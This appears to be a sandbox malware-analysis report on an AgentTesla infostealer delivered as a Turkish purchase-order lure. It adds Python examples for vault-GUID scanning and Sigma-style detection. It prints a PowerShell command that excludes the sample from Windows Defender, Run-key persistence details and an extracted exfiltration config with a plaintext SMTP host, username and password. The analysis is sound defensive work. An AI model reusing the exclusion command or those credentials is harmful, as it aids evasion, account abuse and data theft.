
Windows Analysis Report
baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe

Overview

General Information

Sample name: baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe
(renamed by the sandbox: the #Uxxxx sequences are escapes for the non-ASCII characters of the original file name, U+0131 "ı" and U+015F "ş")
Original sample name: baymarhavuzculuk Satınalma Siparişi 20230331,pdf.exe ("Satınalma Siparişi" is Turkish for "purchase order"; note the ",pdf.exe" double-extension lure)
Analysis ID: 1446058
MD5: b90266d6b73db4f10b1cc8f90a81a4aa
SHA1: 9422dd5935c7299da1c6c8b7b5e0e9e89743ddfb
SHA256: b5e9a3a112c889e9afaa48926ed0bf9474fb430cc99dff8915192877f58d5efe
Tags: AgentTesla, exe, geo, TUR

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Contains functionality to log keystrokes (.Net Source)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Outbound SMTP Connections
Uses 32bit PE files
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe (PID: 7192 cmdline: "C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe" MD5: B90266D6B73DB4F10B1CC8F90A81A4AA)
    • powershell.exe (PID: 7332 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • ctsdvwT.exe (PID: 7644 cmdline: "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe" MD5: B90266D6B73DB4F10B1CC8F90A81A4AA)
    • ctsdvwT.exe (PID: 7752 cmdline: "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe" MD5: B90266D6B73DB4F10B1CC8F90A81A4AA)
  • ctsdvwT.exe (PID: 7952 cmdline: "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe" MD5: B90266D6B73DB4F10B1CC8F90A81A4AA)
    • ctsdvwT.exe (PID: 8020 cmdline: "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe" MD5: B90266D6B73DB4F10B1CC8F90A81A4AA)
  • cleanup
Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Extracted malware configuration (AgentTesla):
{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.saralgumruk.com", "Username": "syilmaz@saralgumruk.com", "Password": "Srl--789789_"}
The configuration predicts the network indicator seen later in the report: a TCP/587 connection to mail.saralgumruk.com initiated by the sample process itself rather than by a mail client.
Yara matches in memory dumps (Source | Rule | Description | Author):
00000005.00000002.1325496333.00000000044B1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000005.00000002.1325496333.00000000044B1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
0000000C.00000002.1545932299.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
0000000C.00000002.1545932299.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
0000000A.00000002.1486766690.00000000043BF000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
(20 entries in the full report; first five shown)
Yara matches in unpacked PE files (Source | Rule | Description | Author):
13.2.ctsdvwT.exe.409f328.4.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
13.2.ctsdvwT.exe.409f328.4.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
13.2.ctsdvwT.exe.409f328.4.unpack | INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID | Detects executables referencing Windows vault credential objects. Observed in infostealers | ditekSHen
  Matched strings:
  • 0x318da: $s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
  • 0x3194c: $s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
  • 0x319d6: $s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
  • 0x31a68: $s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
  • 0x31ad2: $s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
  • 0x31b44: $s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
  • 0x31bda: $s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
  • 0x31c6a: $s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
10.2.ctsdvwT.exe.43f9d68.5.raw.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
10.2.ctsdvwT.exe.43f9d68.5.raw.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
(36 entries in the full report; first five shown)
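The VaultSchemaGUID rule fires on string literals, and the offsets it reports are spaced at least 0x6a bytes apart, which leaves room for 36-character GUIDs stored as 72-byte UTF-16LE strings, the way a .NET assembly keeps its literals in the #US heap. A scanner that only looks for ASCII would miss them. The following is an added example written for this page (not the rule author's or Joe Sandbox's code): it searches a buffer for the eight GUIDs in both ASCII and UTF-16LE, case-insensitively, and builds a small constructed buffer that mimics #US heap entries (one-byte length, UTF-16LE text, trailing flag byte) to show the difference between a wide and an ASCII-only scan. The schema names attached to the GUIDs are the names I associate with them from `vaultcmd /list` and public vault-dumping tooling; treat them, and the "two distinct GUIDs" verdict threshold, as assumptions, since the page does not reproduce the rule's condition.

```python
"""Search a buffer for the Windows Vault schema GUIDs used by the
INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID rule, in ASCII and UTF-16LE.
Example code added for this page; not the rule's or Joe Sandbox's code."""
import re
from typing import Dict, List, Tuple

# GUIDs copied from the report's rule match. The schema labels are an
# ASSUMPTION (names as I recall them from `vaultcmd /list` and public
# vault-dumping tools); the scan keys on the GUIDs, not the labels.
VAULT_SCHEMA_GUIDS: Dict[str, str] = {
    "2F1A6504-0641-44CF-8BB5-3612D865F2E5": "Windows Secure Note",
    "3CCD5499-87A8-4B10-A215-608888DD3B55": "Windows Web Password Credential",
    "154E23D0-C644-4E6F-8CE6-5069272F999F": "Windows Credential Picker Protector",
    "4BF4C442-9B8A-41A0-B380-DD4A704DDB28": "Web Credentials",
    "77BC582B-F0A6-4E15-4E80-61736B6F3B29": "Windows Credentials",
    "E69D7838-91B5-4FC9-89D5-230D4D4CC2BC": "Windows Domain Certificate Credential",
    "3E0E35BE-1B77-43E7-B873-AED901B6275B": "Windows Domain Password Credential",
    "3C886FF3-2669-4AA2-A8FB-3F6759A77548": "Windows Extended Credential",
}


def _patterns(guid: str, wide: bool) -> List[Tuple[str, "re.Pattern"]]:
    """Compile case-insensitive byte patterns for the ASCII form and, if
    requested, the UTF-16LE ('wide') form that .NET string literals use."""
    forms = [("ascii", guid.encode("ascii"))]
    if wide:
        forms.append(("wide", guid.encode("utf-16-le")))
    # IGNORECASE on a bytes pattern folds ASCII letters only, so the
    # interleaved NUL bytes of the wide form are matched literally.
    return [(enc, re.compile(re.escape(raw), re.IGNORECASE)) for enc, raw in forms]


def scan_buffer(buf: bytes, wide: bool = True) -> List[Dict]:
    """Return every GUID occurrence with its offset and encoding, sorted by offset."""
    hits: List[Dict] = []
    for guid, label in VAULT_SCHEMA_GUIDS.items():
        for enc, pat in _patterns(guid, wide):
            for m in pat.finditer(buf):
                hits.append({"offset": m.start(), "guid": guid, "encoding": enc, "schema": label})
    hits.sort(key=lambda h: h["offset"])
    return hits


def verdict(buf: bytes, minimum: int = 2, wide: bool = True) -> bool:
    """ASSUMED stand-in for the rule's condition: at least `minimum` distinct GUIDs present."""
    return len({h["guid"] for h in scan_buffer(buf, wide)}) >= minimum


def us_heap_entry(text: str) -> bytes:
    """Build one #US heap blob as ECMA-335 lays it out for short strings:
    a one-byte length, the UTF-16LE characters, then a trailing flag byte."""
    payload = text.encode("utf-16-le") + b"\x00"
    if len(payload) >= 0x80:
        raise ValueError("example only handles single-byte length prefixes")
    return bytes([len(payload)]) + payload


# Constructed sample: a fake PE header, two GUIDs as #US entries, one as plain ASCII.
SAMPLE_BUFFER = (
    b"MZ" + b"\x00" * 62 + b"PE\x00\x00" + b"\x00" * 40          # bytes 0..107
    + us_heap_entry("4BF4C442-9B8A-41A0-B380-DD4A704DDB28")     # text starts at 109
    + b"\x00" * 8
    + us_heap_entry("77BC582B-F0A6-4E15-4E80-61736B6F3B29")     # text starts at 191
    + b"\x00" * 8
    + b"3CCD5499-87A8-4B10-A215-608888DD3B55"                   # ASCII at 272
)

if __name__ == "__main__":
    for h in scan_buffer(SAMPLE_BUFFER):
        print(f"{h['offset']:#08x} {h['encoding']:5} {h['guid']} ({h['schema']})")
    print("wide scan verdict:", verdict(SAMPLE_BUFFER))
    print("ascii-only verdict:", verdict(SAMPLE_BUFFER, wide=False))
```

Run against the constructed buffer, the wide scan reports all three GUIDs while the ASCII-only scan sees just the last one and fails the verdict; the same gap applies to any string-based rule you write for .NET stealers, so declare such strings `wide ascii` in YARA.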

                    System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe", ParentImage: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe, ParentProcessId: 7192, ParentProcessName: baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe", ProcessId: 7332, ProcessName: powershell.exe
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe, ProcessId: 7348, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ctsdvwT
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe", ParentImage: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe, ParentProcessId: 7192, ParentProcessName: baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe", ProcessId: 7332, ProcessName: powershell.exe
Source: Network Connection | Author: frack113 | Data: DestinationIp: 185.81.155.88, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe, Initiated: true, ProcessId: 7348, Protocol: tcp, SourceIp: 192.168.2.9, SourceIsIpv6: false, SourcePort: 59154
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe", ParentImage: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe, ParentProcessId: 7192, ParentProcessName: baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe", ProcessId: 7332, ProcessName: powershell.exe
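The Sigma hits above boil down to three behaviours worth carrying into your own telemetry: powershell.exe adding a Defender exclusion, a Run-key value pointing into %AppData%, and an outbound TCP/587 connection initiated by the sample process itself. Below is an added example, written for this page and not Joe Sandbox's or the Sigma project's code, that expresses the same three checks in Python over a handful of constructed Sysmon-style events (EventID 1, 13 and 3). Two details from the report shape it: the spawned PowerShell has a System32 path on its command line but a SysWOW64 Image (WoW64 redirection for a 32-bit parent), so the check matches on the image basename rather than the full path; and the "Base64 Encoded MpPreference Cmdlet" rule exists because the same cmdlet can be hidden behind -EncodedCommand, so a helper decodes that argument before matching. The mail-client allowlist, the port set, PID 7333 and the two benign control events are assumptions made for the example.

```python
"""Python re-statement of the three Sigma behaviours the report flagged, run
over constructed Sysmon-style events. Example code added for this page; not
Joe Sandbox's or the Sigma project's implementation."""
import base64
import re
from typing import Callable, Dict, List

# ASSUMED allowlists for the example; tune to the estate.
MAIL_CLIENTS = {"outlook.exe", "thunderbird.exe"}
SMTP_PORTS = {25, 465, 587, 2525}


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def _reveal_encoded(cmd: str) -> str:
    """Append the UTF-16LE script hidden behind -e/-ec/-enc/-EncodedCommand, if any,
    so a cmdlet smuggled in base64 is matched the same way as a plain one."""
    m = re.search(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", cmd, re.IGNORECASE)
    if not m:
        return cmd
    try:
        return cmd + " " + base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return cmd


def rule_defender_exclusion(ev: Dict) -> bool:
    """EventID 1: powershell.exe adding a Defender exclusion. Matching on the image
    basename covers the SysWOW64 copy that a 32-bit parent is redirected to."""
    if ev.get("EventID") != 1 or _basename(ev.get("Image", "")) != "powershell.exe":
        return False
    cmd = _reveal_encoded(ev.get("CommandLine", "")).lower()
    return "add-mppreference" in cmd and "-exclusion" in cmd


def rule_autorun_key(ev: Dict) -> bool:
    """EventID 13: a value written under a CurrentVersion\\Run or RunOnce key."""
    if ev.get("EventID") != 13 or ev.get("EventType") != "SetValue":
        return False
    return "\\software\\microsoft\\windows\\currentversion\\run" in ev.get("TargetObject", "").lower()


def rule_outbound_smtp(ev: Dict) -> bool:
    """EventID 3: an initiated TCP connection to an SMTP port from a non-mail process."""
    return (ev.get("EventID") == 3 and ev.get("Initiated") is True
            and ev.get("Protocol") == "tcp"
            and ev.get("DestinationPort") in SMTP_PORTS
            and _basename(ev.get("Image", "")) not in MAIL_CLIENTS)


RULES: Dict[str, Callable[[Dict], bool]] = {
    "Powershell Defender Exclusion": rule_defender_exclusion,
    "CurrentVersion Autorun Keys Modification": rule_autorun_key,
    "Suspicious Outbound SMTP Connections": rule_outbound_smtp,
}


def run_rules(events: List[Dict]) -> Dict[str, List[int]]:
    """Return, per rule, the ProcessIds of the events it matched."""
    hits: Dict[str, List[int]] = {name: [] for name in RULES}
    for ev in events:
        for name, check in RULES.items():
            if check(ev):
                hits[name].append(ev["ProcessId"])
    return hits


def _encode_ps(script: str) -> str:
    """PowerShell's -EncodedCommand format: base64 over UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


SAMPLE = r"C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe"
POWERSHELL_32 = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"

# Constructed events modelled on the report's Sigma 'Data:' fields, plus an
# encoded variant (PID 7333 is invented) and two benign controls.
SAMPLE_EVENTS: List[Dict] = [
    {"EventID": 1, "ProcessId": 7332, "Image": POWERSHELL_32, "ParentImage": SAMPLE,
     "CommandLine": '"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
                    'Add-MpPreference -ExclusionPath "' + SAMPLE + '"'},
    {"EventID": 1, "ProcessId": 7333, "Image": POWERSHELL_32, "ParentImage": SAMPLE,
     "CommandLine": "powershell.exe -enc " + _encode_ps('Add-MpPreference -ExclusionPath "' + SAMPLE + '"')},
    {"EventID": 13, "ProcessId": 7348, "EventType": "SetValue", "Image": SAMPLE,
     "TargetObject": r"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ctsdvwT",
     "Details": r"C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"},
    {"EventID": 3, "ProcessId": 7348, "Image": SAMPLE, "Initiated": True, "Protocol": "tcp",
     "DestinationIp": "185.81.155.88", "DestinationPort": 587},
    {"EventID": 1, "ProcessId": 100, "Image": POWERSHELL_32, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe Get-MpPreference"},
    {"EventID": 3, "ProcessId": 101, "Image": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "Initiated": True, "Protocol": "tcp", "DestinationIp": "10.0.0.5", "DestinationPort": 587},
]

if __name__ == "__main__":
    for rule, pids in run_rules(SAMPLE_EVENTS).items():
        print(f"{rule}: {pids}")
```

The exclusion rule fires on both the plain and the base64-encoded command line, the two controls stay quiet, and PID 7348 (the process that wrote the Run key and opened the SMTP connection in the report, which is not in the visible process tree) is the one to pivot on; on a real host the corresponding check is `Get-MpPreference | Select-Object -ExpandProperty ExclusionPath` and a look at HKCU\...\CurrentVersion\Run.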
                    No Snort rule has matched


                    AV Detection

Source: 13.2.ctsdvwT.exe.409f328.4.raw.unpack | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.saralgumruk.com", "Username": "syilmaz@saralgumruk.com", "Password": "Srl--789789_"}
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | ReversingLabs: Detection: 36%
Source: baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | ReversingLabs: Detection: 36%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Joe Sandbox ML: detected
Source: baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Joe Sandbox ML: detected
Source: baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Code function: 4x nop then jmp 05E98B16h (5_2_05E98C6F)
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Code function: 4x nop then jmp 066F802Eh (10_2_066F8187)
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Code function: 4x nop then jmp 0609802Eh (13_2_06098187)

                    Networking

Source: Yara match | File source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.3bcd820.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.3b92c00.5.raw.unpack, type: UNPACKEDPE
Source: global traffic | TCP traffic: 192.168.2.9:59154 -> 185.81.155.88:587
Source: Joe Sandbox View | ASN Name: RADORETR RADORETR
Source: global traffic | TCP traffic: 192.168.2.9:59154 -> 185.81.155.88:587
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: mail.saralgumruk.com
Source: baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe, 00000009.00000002.2545517189.0000000002D39000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://mail.saralgumruk.com
Source: baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe, 00000005.00000002.1320959148.00000000028D2000.00000004.00000800.00020000.00000000.sdmp, ctsdvwT.exe, 0000000A.00000002.1485685529.0000000003102000.00000004.00000800.00020000.00000000.sdmp, ctsdvwT.exe, 0000000D.00000002.1568438809.0000000002DE5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe, 00000005.00000002.1325496333.00000000044B1000.00000004.00000800.00020000.00000000.sdmp, baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe, 00000005.00000002.1325496333.0000000003B92000.00000004.00000800.00020000.00000000.sdmp, ctsdvwT.exe, 0000000A.00000002.1486766690.00000000043BF000.00000004.00000800.00020000.00000000.sdmp, ctsdvwT.exe, 0000000C.00000002.1545932299.0000000000402000.00000040.00000400.00020000.00000000.sdmp, ctsdvwT.exe, 0000000D.00000002.1575415406.000000000409F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://account.dyn.com/

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.3bcd820.4.raw.unpack, gmBpn1ecBmQ.cs | .Net Code: Dm1L2C2
Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.3b92c00.5.raw.unpack, gmBpn1ecBmQ.cs | .Net Code: Dm1L2C2
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Window created: window name: CLIPBRDWNDCLASS

                    System Summary

Source: 13.2.ctsdvwT.exe.409f328.4.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
Source: 10.2.ctsdvwT.exe.43f9d68.5.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
Source: 13.2.ctsdvwT.exe.40d9f48.3.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
Source: 10.2.ctsdvwT.exe.43bf148.4.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
Source: 12.2.ctsdvwT.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.3b92c00.5.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
Source: 10.2.ctsdvwT.exe.43f9d68.5.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
Source: 13.2.ctsdvwT.exe.40d9f48.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.3bcd820.4.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.3bcd820.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
Source: 10.2.ctsdvwT.exe.43bf148.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
Source: 13.2.ctsdvwT.exe.409f328.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.3b92c00.5.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
